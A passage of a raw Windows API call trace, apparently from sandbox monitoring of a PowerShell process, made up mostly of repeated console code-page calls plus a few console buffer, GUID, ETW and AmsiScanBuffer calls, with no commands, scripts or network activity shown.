lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.650] GetConsoleOutputCP () returned 0x1b5 [0345.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.651] GetConsoleOutputCP () returned 0x1b5 [0345.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.651] GetConsoleOutputCP () returned 0x1b5 [0345.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.652] GetConsoleOutputCP () returned 0x1b5 [0345.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.653] GetConsoleOutputCP () returned 0x1b5 [0345.653] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.653] GetConsoleOutputCP () returned 0x1b5 [0345.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.654] GetConsoleOutputCP () returned 0x1b5 [0345.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.654] GetConsoleOutputCP () returned 0x1b5 [0345.655] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.655] GetConsoleOutputCP () returned 0x1b5 [0345.655] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.655] GetConsoleOutputCP () returned 0x1b5 [0345.656] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.656] GetConsoleOutputCP () returned 0x1b5 [0345.656] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.656] GetConsoleOutputCP () returned 0x1b5 [0345.657] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.657] GetConsoleOutputCP () returned 0x1b5 [0345.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.658] GetConsoleOutputCP () returned 0x1b5 [0345.663] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.663] GetConsoleOutputCP () returned 0x1b5 [0345.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.664] GetConsoleOutputCP () returned 0x1b5 [0345.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.665] GetConsoleOutputCP () returned 0x1b5 [0345.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.665] GetConsoleOutputCP () returned 0x1b5 [0345.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.666] GetConsoleOutputCP () returned 0x1b5 [0345.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.666] GetConsoleOutputCP () returned 0x1b5 [0345.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.667] GetConsoleOutputCP () returned 0x1b5 [0345.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.667] GetConsoleOutputCP () returned 0x1b5 [0345.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.668] GetConsoleOutputCP () returned 0x1b5 [0345.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.669] GetConsoleOutputCP () returned 0x1b5 [0345.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.669] GetConsoleOutputCP () returned 0x1b5 [0345.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.670] GetConsoleOutputCP () returned 0x1b5 [0345.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.670] GetConsoleOutputCP () returned 0x1b5 [0345.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.671] GetConsoleOutputCP () returned 0x1b5 [0345.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.671] GetConsoleOutputCP () returned 0x1b5 [0345.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.672] GetConsoleOutputCP () returned 0x1b5 [0345.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.672] GetConsoleOutputCP () returned 0x1b5 [0345.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.673] GetConsoleOutputCP () returned 0x1b5 [0345.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.778] GetConsoleOutputCP () returned 0x1b5 [0345.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.784] GetConsoleOutputCP () returned 0x1b5 [0345.784] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.784] GetConsoleOutputCP () returned 0x1b5 [0345.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.785] GetConsoleOutputCP () returned 0x1b5 [0345.785] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.785] GetConsoleOutputCP () returned 0x1b5 [0345.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.786] GetConsoleOutputCP () returned 0x1b5 [0345.786] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.787] GetConsoleOutputCP () returned 0x1b5 [0345.787] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.787] GetConsoleOutputCP () returned 0x1b5 [0345.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.788] GetConsoleOutputCP () returned 0x1b5 [0345.788] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.788] GetConsoleOutputCP () returned 0x1b5 [0345.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.789] GetConsoleOutputCP () returned 0x1b5 [0345.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.789] GetConsoleOutputCP () returned 0x1b5 [0345.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.790] GetConsoleOutputCP () returned 0x1b5 [0345.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.791] GetConsoleOutputCP () returned 0x1b5 [0345.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.791] GetConsoleOutputCP () returned 0x1b5 [0345.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.792] GetConsoleOutputCP () returned 0x1b5 [0345.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.792] GetConsoleOutputCP () returned 0x1b5 [0345.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.793] GetConsoleOutputCP () returned 0x1b5 [0345.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.793] GetConsoleOutputCP () returned 0x1b5 [0345.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0346.893] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62df88 | out: lpConsoleScreenBufferInfo=0x1b62df88) returned 1 [0346.894] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62df28 | out: lpConsoleScreenBufferInfo=0x1b62df28) returned 1 [0346.895] GetConsoleOutputCP () returned 0x1b5 [0346.896] CoTaskMemAlloc (cb=0x960) returned 0x1a872f90 [0346.896] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a872f90, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62de20 | out: lpBuffer=0x1a872f90, lpReadRegion=0x1b62de20) returned 1 [0346.898] CoTaskMemFree (pv=0x1a872f90) [0346.899] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dd48 | out: lpConsoleScreenBufferInfo=0x1b62dd48) returned 1 [0346.900] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62df88 | out: lpConsoleScreenBufferInfo=0x1b62df88) returned 1 [0346.900] GetConsoleOutputCP () returned 0x1b5 [0346.901] CoTaskMemAlloc (cb=0x960) returned 0x1a872f90 [0346.902] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a872f90, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62de10 | out: lpWriteRegion=0x1b62de10) returned 1 [0346.903] CoTaskMemFree (pv=0x1a872f90) [0346.904] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a8742c0*=0x720, lpdwindex=0x1b62db54 | out: lpdwindex=0x1b62db54) returned 0x0 [0347.340] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5b9be0*=0x81c, lpdwindex=0x1b62d844 | out: lpdwindex=0x1b62d844) returned 0x0 [0347.424] EtwEventActivityIdControl () returned 0x0 [0347.424] EtwEventActivityIdControl () returned 0x0 [0347.424] EtwEventActivityIdControl () returned 0x0 [0347.438] EtwEventActivityIdControl () returned 0x0 [0347.438] EtwEventActivityIdControl () returned 0x0 [0347.438] EtwEventActivityIdControl () returned 0x0 [0347.450] CoCreateGuid (in: pguid=0x1b62d858 | out: pguid=0x1b62d858*(Data1=0x6eefc8d1, Data2=0x60f0, Data3=0x4c6f, Data4=([0]=0xa7, [1]=0xea, [2]=0x63, [3]=0x67, [4]=0xba, [5]=0xe, [6]=0xf6, [7]=0xba))) returned 0x0 [0347.493] AmsiScanBuffer () returned 0x80070015 [0348.836] CoCreateGuid (in: pguid=0x1b62d858 | out: pguid=0x1b62d858*(Data1=0xfc974d80, Data2=0x724a, Data3=0x47f4, Data4=([0]=0x89, [1]=0x3c, [2]=0xc4, [3]=0x41, [4]=0x10, [5]=0x47, [6]=0x6b, [7]=0x88))) returned 0x0 [0348.846] AmsiScanBuffer () returned 0x80070015 [0349.249] CoCreateGuid (in: pguid=0x1b62cf68 | out: pguid=0x1b62cf68*(Data1=0x8ffa4a0b, Data2=0x4061, Data3=0x4a67, Data4=([0]=0xa6, [1]=0xb9, [2]=0xe5, [3]=0xfc, [4]=0x50, [5]=0x24, [6]=0x3f, [7]=0x99))) returned 0x0 [0349.249] AmsiScanBuffer () returned 0x80070015 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.251] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.251] EtwEventActivityIdControl () returned 0x0 [0349.253] EtwEventActivityIdControl () returned 0x0 [0349.375] AmsiScanBuffer () returned 0x80070015 [0349.398] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x5dc [0349.399] CoCreateGuid (in: pguid=0x1b62c138 | out: pguid=0x1b62c138*(Data1=0x87989665, Data2=0x627c, Data3=0x436f, Data4=([0]=0xbd, [1]=0x1c, [2]=0x47, [3]=0xe3, [4]=0xf8, [5]=0x95, [6]=0x7d, [7]=0x5d))) returned 0x0 [0349.399] AmsiScanBuffer () returned 0x80070015 [0349.402] EtwEventActivityIdControl () returned 0x0 [0349.402] EtwEventActivityIdControl () returned 0x0 [0349.402] EtwEventActivityIdControl () returned 0x0 [0349.402] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62b580, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0349.403] EtwEventActivityIdControl () returned 0x0 [0349.403] EtwEventActivityIdControl () returned 0x0 [0349.403] EtwEventActivityIdControl () returned 0x0 [0349.403] EtwEventActivityIdControl () returned 0x0 [0349.731] EtwEventActivityIdControl () returned 0x0 [0349.731] EtwEventActivityIdControl () returned 0x0 [0349.731] EtwEventActivityIdControl () returned 0x0 [0349.731] EtwEventActivityIdControl () returned 0x0 [0350.148] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62cf28 | out: lpConsoleScreenBufferInfo=0x1b62cf28) returned 1 [0350.360] CoCreateGuid (in: pguid=0x1b62cf68 | out: pguid=0x1b62cf68*(Data1=0xfcfb1c08, Data2=0x10f6, Data3=0x42bd, Data4=([0]=0xaa, [1]=0x1f, [2]=0xe4, [3]=0xbe, [4]=0x6f, [5]=0xef, [6]=0x16, [7]=0xde))) returned 0x0 [0350.361] AmsiScanBuffer () returned 0x80070015 [0350.362] EtwEventActivityIdControl () returned 0x0 [0350.362] EtwEventActivityIdControl () returned 0x0 [0350.362] EtwEventActivityIdControl () returned 0x0 [0350.362] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0350.363] EtwEventActivityIdControl () returned 0x0 [0350.363] EtwEventActivityIdControl () returned 0x0 [0350.363] EtwEventActivityIdControl () returned 0x0 [0350.363] EtwEventActivityIdControl () returned 0x0 [0350.419] EtwEventActivityIdControl () returned 0x0 [0350.419] EtwEventActivityIdControl () returned 0x0 [0351.115] CoCreateGuid (in: pguid=0x1b62cf68 | out: pguid=0x1b62cf68*(Data1=0xc6a897e1, Data2=0xc44b, Data3=0x4f04, Data4=([0]=0xb1, [1]=0xc9, [2]=0x2d, [3]=0x39, [4]=0x4c, [5]=0x3a, [6]=0x97, [7]=0x95))) returned 0x0 [0351.115] AmsiScanBuffer () returned 0x80070015 [0351.116] EtwEventActivityIdControl () returned 0x0 [0351.116] EtwEventActivityIdControl () returned 0x0 [0351.116] EtwEventActivityIdControl () returned 0x0 [0351.116] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.117] EtwEventActivityIdControl () returned 0x0 [0351.117] EtwEventActivityIdControl () returned 0x0 [0351.117] EtwEventActivityIdControl () returned 0x0 [0351.117] EtwEventActivityIdControl () returned 0x0 [0351.189] EtwEventActivityIdControl () returned 0x0 [0351.189] EtwEventActivityIdControl () returned 0x0 [0351.236] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62db98 | out: lpConsoleScreenBufferInfo=0x1b62db98) returned 1 [0351.323] GetConsoleOutputCP () returned 0x1b5 [0351.323] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.324] GetConsoleOutputCP () returned 0x1b5 [0351.325] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.325] GetConsoleOutputCP () returned 0x1b5 [0351.325] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.326] GetConsoleOutputCP () returned 0x1b5 [0351.326] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.326] GetConsoleOutputCP () returned 0x1b5 [0351.327] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.327] GetConsoleOutputCP () returned 0x1b5 [0351.328] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.328] GetConsoleOutputCP () returned 0x1b5 [0351.328] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.329] GetConsoleOutputCP () returned 0x1b5 [0351.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.329] GetConsoleOutputCP () returned 0x1b5 [0351.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.330] GetConsoleOutputCP () returned 0x1b5 [0351.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.331] GetConsoleOutputCP () returned 0x1b5 [0351.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.332] GetConsoleOutputCP () returned 0x1b5 [0351.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.332] GetConsoleOutputCP () returned 0x1b5 [0351.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.333] GetConsoleOutputCP () returned 0x1b5 [0351.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.334] GetConsoleOutputCP () returned 0x1b5 [0351.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.335] GetConsoleOutputCP () returned 0x1b5 [0351.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.335] GetConsoleOutputCP () returned 0x1b5 [0351.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.336] GetConsoleOutputCP () returned 0x1b5 [0351.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.336] GetConsoleOutputCP () returned 0x1b5 [0351.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.337] GetConsoleOutputCP () returned 0x1b5 [0351.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.338] GetConsoleOutputCP () returned 0x1b5 [0351.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.338] GetConsoleOutputCP () returned 0x1b5 [0351.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.339] GetConsoleOutputCP () returned 0x1b5 [0351.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.339] GetConsoleOutputCP () returned 0x1b5 [0351.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.340] GetConsoleOutputCP () returned 0x1b5 [0351.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.340] GetConsoleOutputCP () returned 0x1b5 [0351.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.341] GetConsoleOutputCP () returned 0x1b5 [0351.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.341] GetConsoleOutputCP () returned 0x1b5 [0351.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.341] GetConsoleOutputCP () returned 0x1b5 [0351.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.342] GetConsoleOutputCP () returned 0x1b5 [0351.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.342] GetConsoleOutputCP () returned 0x1b5 [0351.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.343] GetConsoleOutputCP () returned 0x1b5 [0351.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.343] GetConsoleOutputCP () returned 0x1b5 [0351.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.343] GetConsoleOutputCP () returned 0x1b5 [0351.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.344] GetConsoleOutputCP () returned 0x1b5 [0351.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.344] GetConsoleOutputCP () returned 0x1b5 [0351.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.345] GetConsoleOutputCP () returned 0x1b5 [0351.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.345] GetConsoleOutputCP () returned 0x1b5 [0351.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.346] GetConsoleOutputCP () returned 0x1b5 [0351.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.346] GetConsoleOutputCP () returned 0x1b5 [0351.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.346] GetConsoleOutputCP () returned 0x1b5 [0351.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.347] GetConsoleOutputCP () returned 0x1b5 [0351.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.347] GetConsoleOutputCP () returned 0x1b5 [0351.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.348] GetConsoleOutputCP () returned 0x1b5 [0351.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.349] 